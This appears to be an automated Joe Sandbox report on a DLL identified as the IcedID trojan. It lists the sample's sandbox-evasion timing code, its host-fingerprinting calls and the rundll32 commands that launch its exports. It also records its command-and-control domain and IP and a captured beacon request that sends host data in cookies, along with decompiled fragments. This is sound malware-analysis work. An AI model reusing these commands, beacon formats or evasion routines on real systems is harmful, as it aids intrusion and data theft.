    Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (reported for 9 rundll32.exe processes)

    Malware Analysis System Evasion

    Source: C:\Windows\System32\rundll32.exe | RDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions:
        0x00000000 rdtsc
        0x00000002 dec eax
        0x00000003 shl edx, 20h
        0x00000006 dec eax
        0x00000007 or eax, edx
        0x00000009 dec esp
        0x0000000a mov eax, eax
        0x0000000c xor ecx, ecx
        0x0000000e mov eax, 00000001h
        0x00000013 cpuid
        0x00000015 mov dword ptr [esp+20h], eax
        0x00000019 mov dword ptr [esp+24h], ebx
        0x0000001d mov dword ptr [esp+28h], ecx
        0x00000021 mov dword ptr [esp+2Ch], edx
        0x00000025 rdtsc
    Source: C:\Windows\System32\rundll32.exe | RDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions:
        0x00000000 rdtsc
        0x00000002 dec eax
        0x00000003 shl edx, 20h
        0x00000006 nop
        0x00000007 dec eax
        0x00000008 or eax, edx
        0x0000000a dec eax
        0x0000000b mov ecx, eax
        0x0000000d rdtsc
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000000180002AC0 SwitchToThread,SwitchToThread,3_2_0000000180002AC0
    Source: C:\Windows\System32\loaddll64.exe TID: 4980 | Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\System32\rundll32.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_000000018000133C
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000000180002174 rdtsc 3_2_0000000180002174
    Source: C:\Windows\System32\loaddll64.exe | Thread delayed: delay time: 120000
    Source: rundll32.exe, 00000003.00000002.432179875.0000021282104000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: rundll32.exe, 00000003.00000002.432179875.0000021282104000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW'
    Source: rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_000000018000108C
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_0000000180001C28

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\rundll32.exe | Network Connect: 64.227.108.27 80
    Source: C:\Windows\System32\rundll32.exe | Domain query: alexbionka.com
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Source: C:\Windows\System32\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW,3_2_0000000180002018

    Stealing of Sensitive Information

    Source: Yara match | File source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara match | File source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara match | File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE

    Remote Access Functionality

    Source: Yara match | File source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara match | File source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara match | File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: 1 Native API; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
    Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
    Privilege Escalation: 111 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
    Defense Evasion: 11 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Obfuscated Files or Information; 1 Rundll32; Software Packing; Steganography; Compile After Delivery
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
    Discovery: 221 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 1 Account Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; 22 System Information Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
    Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
    Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
    Source | Detection | Scanner | Label
    y2D56.tmp.dll | 14% | Virustotal |
    y2D56.tmp.dll | 100% | Avira | HEUR/AGEN.1251556
    No Antivirus matches
    Source | Detection | Scanner | Label
    3.2.rundll32.exe.7ffa65c50000.2.unpack | 100% | Avira | HEUR/AGEN.1251556
    3.2.rundll32.exe.180000000.0.unpack | 100% | Avira | HEUR/AGEN.1205098
    Source | Detection | Scanner | Label
    alexbionka.com | 9% | Virustotal |
    Source | Detection | Scanner | Label
    alexbionka.com | 100% | Avira URL Cloud | malware
    http://alexbionka.com/QpkO | 100% | Avira URL Cloud | malware
    http://alexbionka.com/ | 100% | Avira URL Cloud | malware
    http://alexbionka.com/UN | 100% | Avira URL Cloud | malware
    http://alexbionka.com:80/h | 100% | Avira URL Cloud | malware
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    alexbionka.com | 64.227.108.27 | true | true | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    alexbionka.com | true | Avira URL Cloud: malware | unknown
    http://alexbionka.com/ | true | Avira URL Cloud: malware | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://alexbionka.com/QpkO | rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
    http://alexbionka.com/UN | rundll32.exe, 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
    http://alexbionka.com:80/h | rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    64.227.108.27 | alexbionka.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
    Joe Sandbox Version:35.0.0 Citrine
    Analysis ID:682775
    Start date and time:2022-08-12 00:27:08 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 3m 42s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:y2D56.tmp.dll
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:13
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.evad.winDLL@21/0@1/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 77.7% (good quality ratio 58.6%)
    • Quality average: 55.7%
    • Quality standard deviation: 38.8%
    HCA Information:
    • Successful, ratio: 96%
    • Number of executed functions: 15
    • Number of non-executed functions: 12
    Cookbook Comments:
    • Found application associated with file extension: .dll
    • Adjust boot time
    • Enable AMSI
    • Stop behavior analysis, all processes terminated
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
    • Not all processes were analyzed, report is missing behavior information
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    Time | Type | Description
    00:28:21 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
    00:28:21 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
    No created / dropped files found
    File type:PE32+ executable (DLL) (console) x86-64, for MS Windows
    Entropy (8bit):4.6693263018201145
    TrID:
    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
    • Win64 Executable (generic) (12005/4) 10.17%
    • Generic Win/DOS Executable (2004/3) 1.70%
    • DOS Executable Generic (2002/1) 1.70%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
    File name:y2D56.tmp.dll
    File size:360448
    MD5:363777daf36e9534762d30bd4bf22c74
    SHA1:ea94d9afd355dd23a069f21b3562d85a4266da4f
    SHA256:8cd135e5b49d16aceb7665b6316cd4df2e132ef503ff0af51c080bad7010efd6
    SHA512:c8cac2963c8454890483823738e5adcaee4e945839b64d241d545d3dbc9a798fba7d923eb764cb455db2d27992915cd5f6ef9fae0b05175b7f8ae9669db93d53
    SSDEEP:6144:RYCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:SCwMfjSlE+A4eguRJDtPZIG46FkEH9
    TLSH:6674AFB8F704A9E7D52E527BCA96BCD903722E629FCAD9CD416477C305A3725FE02804
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3.....Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x.................
    Icon Hash:74f0e4ecccdce0e4
    Entrypoint:0x180000000
    Entrypoint Section:
    Digitally signed:false
    Imagebase:0x180000000
    Subsystem:windows cui
    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Time Stamp:0x62F4D159 [Thu Aug 11 09:52:25 2022 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:6
    OS Version Minor:0
    File Version Major:6
    File Version Minor:0
    Subsystem Version Major:6
    Subsystem Version Minor:0
    Import Hash:
    Instruction
    dec ebp
    pop edx
    nop
    add byte ptr [ebx], al
    add byte ptr [eax], al
    add byte ptr [eax+eax], al
    add byte ptr [eax], al
    Name | Virtual Address | Virtual Size | Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x59000 | 0x17d | .rdata
    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5a000 | 0x1e0 | .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
    .text | 0x1000 | 0x57714 | 0x57800 | False | 0.5704436383928572 | DOS executable (COM) | 4.650785896133885 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata | 0x59000 | 0x17d | 0x200 | False | 0.63671875 | data | 4.436426000455931 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .rsrc | 0x5a000 | 0x1e0 | 0x200 | False | 0.53125 | data | 4.724728911998389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    Name | RVA | Size | Type | Language | Country
    RT_MANIFEST | 0x5a060 | 0x17d | XML 1.0 document text | English | United States
    Name | Ordinal | Address
    JfUksQmDGYQRSQfC | 2 | 0x180009422
    MVeMOgOlu | 3 | 0x1800098fa
    OnqcowdLVOpj | 4 | 0x18000986e
    aXXRQNg | 5 | 0x180009bee
    agetCYHzlW | 6 | 0x180009487
    bbMIBZKkpJrSw | 7 | 0x18000976d
    nvWxVSzNIh | 8 | 0x180009532
    onXyNAQeqW | 9 | 0x180009b56
    qBYCIPM | 10 | 0x180009d39
    raiafa | 11 | 0x180009a6f
    ryiLrNIWKPUxQAhG | 12 | 0x1800096ea
    tndPRjog | 13 | 0x18000944d
    vGGAkgKOkEwmNdGA | 14 | 0x1800095f0
    zBiUZzLtC | 15 | 0x1800099c1
    ztyasufasklfmjnaks | 1 | 0x18000105e
    Language of compilation system | Country where language is spoken
    English | United States
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    Aug 12, 2022 00:28:21.351857901 CEST | 49716 | 80 | 192.168.2.5 | 64.227.108.27
    Aug 12, 2022 00:28:21.527837992 CEST | 80 | 49716 | 64.227.108.27 | 192.168.2.5
    Aug 12, 2022 00:28:21.527980089 CEST | 49716 | 80 | 192.168.2.5 | 64.227.108.27
    Aug 12, 2022 00:28:21.528403997 CEST | 49716 | 80 | 192.168.2.5 | 64.227.108.27
    Aug 12, 2022 00:28:21.702569008 CEST | 80 | 49716 | 64.227.108.27 | 192.168.2.5
    Aug 12, 2022 00:28:22.168242931 CEST | 80 | 49716 | 64.227.108.27 | 192.168.2.5
    Aug 12, 2022 00:28:22.288031101 CEST | 49716 | 80 | 192.168.2.5 | 64.227.108.27
    Aug 12, 2022 00:28:23.504345894 CEST | 49716 | 80 | 192.168.2.5 | 64.227.108.27
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    Aug 12, 2022 00:28:21.294488907 CEST | 59746 | 53 | 192.168.2.5 | 8.8.8.8
    Aug 12, 2022 00:28:21.317162991 CEST | 53 | 59746 | 8.8.8.8 | 192.168.2.5
    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
    Aug 12, 2022 00:28:21.294488907 CEST | 192.168.2.5 | 8.8.8.8 | 0x8425 | Standard query (0) | alexbionka.com | A (IP address) | IN (0x0001)
    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
    Aug 12, 2022 00:28:21.317162991 CEST | 8.8.8.8 | 192.168.2.5 | 0x8425 | No error (0) | alexbionka.com | | 64.227.108.27 | A (IP address) | IN (0x0001)
    • alexbionka.com
    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    0 | 192.168.2.5 | 49716 | 64.227.108.27 | 80 | C:\Windows\System32\rundll32.exe
    Timestamp | kBytes transferred | Direction | Data
    Aug 12, 2022 00:28:21.528403997 CEST | 92 | OUT | GET / HTTP/1.1
    Connection: Keep-Alive
    Cookie: __gads=3570055661:1:4060:115; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333734363533:616C666F6E73:30394232333031304432353637323145; __io=0; _gid=67AFEDD28876
    Host: alexbionka.com
    Aug 12, 2022 00:28:22.168242931 CEST | 93 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 11 Aug 2022 22:28:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0


    Target ID:0
    Start time:00:28:07
    Start date:12/08/2022
    Path:C:\Windows\System32\loaddll64.exe
    Wow64 process (32bit):false
    Commandline:loaddll64.exe "C:\Users\user\Desktop\y2D56.tmp.dll"
    Imagebase:0x7ff6a02b0000
    File size:140288 bytes
    MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:1
    Start time:00:28:08
    Start date:12/08/2022
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Imagebase:0x7ff602050000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:2
    Start time:00:28:08
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:3
    Start time:00:28:08
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    Reputation:high

    Target ID:4
    Start time:00:28:12
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOlu
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:5
    Start time:00:28:15
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpj
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:6
    Start time:00:28:18
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfC
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:7
    Start time:00:28:19
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOlu
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:9
    Start time:00:28:19
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpj
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:11
    Start time:00:28:20
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNg
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:12
    Start time:00:28:21
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlW
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high


      Execution Graph

      Execution Coverage:4.9%
      Dynamic/Decrypted Code Coverage:83.6%
      Signature Coverage:42.7%
      Total number of Nodes:225
      Total number of Limit Nodes:20
      execution_graph: rendered graph of function nodes (at 0x7ffa65c5xxxx, 0x180001xxx/0x180002xxx and 0x21281d00xxx) with their resolved API calls, among them NtCreateSection, NtMapViewOfSection, SleepEx, wsprintfW, GetProcessHeap/HeapAlloc/HeapFree, GetTickCount64, NtQuerySystemInformation, GetComputerNameExW, GetUserNameW, LookupAccountNameW, GetAdaptersInfo, WinHttpOpen/WinHttpConnect/WinHttpOpenRequest/WinHttpSendRequest/WinHttpReceiveResponse/WinHttpReadData, SHGetFolderPathA, GetTempPathA, CreateFileA/WriteFile, VirtualAlloc, VirtualProtect, LoadLibraryA/GetProcAddress, CreateThread and ExitProcess; node/edge serialization omitted.

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Http$Heap$CloseHandleQuery$AllocDataHeadersOpenProcessRequest$AvailableCallbackConnectFreeOptionReadReceiveResponseSendStatus
      • String ID: GET$POST
      • API String ID: 1614834629-3192705859
      • Opcode ID: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
      • Instruction ID: f84e999ab61f2fbba52d9160ce5dc28e4838b3332290d6c6070ea75f8e9928f1
      • Opcode Fuzzy Hash: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
      • Instruction Fuzzy Hash: A881A972304B8987EBA6CF66E800BD937A5FB4CBD4F448129AE0957B54DF38C698C704
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 24%
      			E0000000118000133C(long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
      				void* __rdi;
      				void* _t16;
      				void* _t19;
      				int _t21;
      				void* _t27;
      				long long* _t35;
      				void* _t49;
      				long long* _t55;
      				long long* _t57;
      				void* _t63;
      				void* _t64;
      				struct HINSTANCE__* _t65;
      				CHAR* _t68;
      
      				_t35 = _t57;
      				 *((long long*)(_t35 + 8)) = __rbx;
      				 *((long long*)(_t35 + 0x18)) = __rbp;
      				 *((long long*)(_t35 + 0x20)) = __rsi;
      				 *(_t35 + 0x10) =  *(_t35 + 0x10) & 0;
      				LoadLibraryA(_t68); // executed
      				GetProcAddress(_t65);
      				_t55 = _t35;
      				if (_t35 == 0) goto 0x800013df;
      				_t16 =  *_t55(); // executed
      				if (_t16 != 0x6f) goto 0x800013df;
      				if (__rbx == 0) goto 0x800013df;
      				GetProcessHeap();
      				HeapAlloc(??, ??, ??);
      				if (_t35 == 0) goto 0x800013df;
      				_t19 =  *_t55(); // executed
      				if (_t19 == 0) goto 0x80001414;
      				GetProcessHeap();
      				_t21 = HeapFree(??, ??, ??);
      				r9d = 1;
      				return E00000001180001578(_t21, 0, _t27, __rbx, __rcx, L"; _gid=", _t35, 0x800070bc, _t63, _t64, _t49);
      			}

      0x18000133c
      0x18000133f
      0x180001343
      0x180001347
      0x180001367
      0x18000136a
      0x18000137a
      0x180001380
      0x180001386
      0x18000138f
      0x180001394
      0x18000139d
      0x18000139f
      0x1800013af
      0x1800013bb
      0x1800013c5
      0x1800013c9
      0x1800013cb
      0x1800013d9
      0x1800013df
      0x180001413

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000003.00000002.431561052.0000000180000000.00000004.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431676219.0000000180006000.00000002.00001000.00020000.00000000.sdmp
      • Associated: 00000003.00000002.431680698.0000000180008000.00000004.00001000.00020000.00000000.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
      Yara matches
      Similarity
      • API ID: Heap$Process$AdaptersFreeInfo$AddressAllocLibraryLoadProc
      • String ID: ; _gid=$GetAdaptersInfo$IPHLPAPI.DLL
      • API String ID: 3866128989-336904856
      • Opcode ID: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
      • Instruction ID: b75e3b5367209cd78c64b13d950b78932923334006a58f125620b5977970df53
      • Opcode Fuzzy Hash: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
